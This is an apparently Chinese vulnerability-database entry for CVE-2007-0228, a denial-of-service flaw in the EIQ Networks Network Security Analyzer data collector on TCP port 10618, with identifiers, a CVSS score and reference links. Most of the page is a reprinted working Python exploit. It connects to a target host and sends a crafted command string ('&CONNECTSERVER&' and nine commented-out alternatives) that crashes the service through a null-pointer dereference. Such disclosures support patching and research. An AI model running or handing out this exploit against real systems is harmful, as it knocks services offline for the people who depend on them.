EIQ Networks 拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111985 漏洞类型 其他
发布时间 2007-01-10 更新时间 2007-01-15
CVE编号 CVE-2007-0228 CNNVD-ID CNNVD-200701-170
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/3112
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-170
|漏洞详情
EIQNetworks网络安全分析器中的数据搜集器服务器远程攻击者可以借助一个发送到TCP端口10618的(1)&CONNECTSERVER&(2)&ADDENTRY&(3)&FIN&(4)&START&(5)&LOGPATH&(6)&FWADELTA&(7)&FWALOG&(8)&SETSYNCHRONOUS&(9)&SETPRGFILE&或(10)&SETREPLYPORT&字符串,引起拒绝服务攻击(服务器崩溃)。这会触发空指针引用。
|漏洞EXP
#!c:\python\python.exe
# uncomment whichever function youd like. theyll all crash in a similar way.

# Any of the following "function names" will cause the service to throw an access violation 
# while dereferencing the return value from a call to FindIndex 
# ( http://msdn2.microsoft.com/de-de/library/a93550bb(VS.80).aspx):

# Ethan Hunt <m34r\[@\]hackermail.com>

import socket

s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
s.connect(('192.168.1.101', 10618))

print "[*] connected"

s.send("&CONNECTSERVER&")
#s.send("&ADDENTRY&")
#s.send("&FIN&")
#s.send("&START&")
#s.send("&LOGPATH&")
#s.send("&FWADELTA&")
#s.send("&FWALOG&")
#s.send("&SETSYNCHRONOUS&")
#s.send("&SETPRGFILE&")
#s.send("&SETREPLYPORT&")

print "disconnecting."

s.close()

# milw0rm.com [2007-01-10]
|参考资料

来源:BID
名称:21994
链接:http://www.securityfocus.com/bid/21994
来源:OSVDB
名称:32725
链接:http://osvdb.org/32725
来源:FULLDISC
名称:20070110EIQNetworksNetworkSecurityAnalyzerDoSVulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2007-01/0209.html
来源:XF
名称:eiq-datacollector-dos(31428)
链接:http://xforce.iss.net/xforce/xfdb/31428
来源:VUPEN
名称:ADV-2007-0147
链接:http://www.frsirt.com/english/advisories/2007/0147
来源:SECUNIA
名称:23693
链接:http://secunia.com/advisories/23693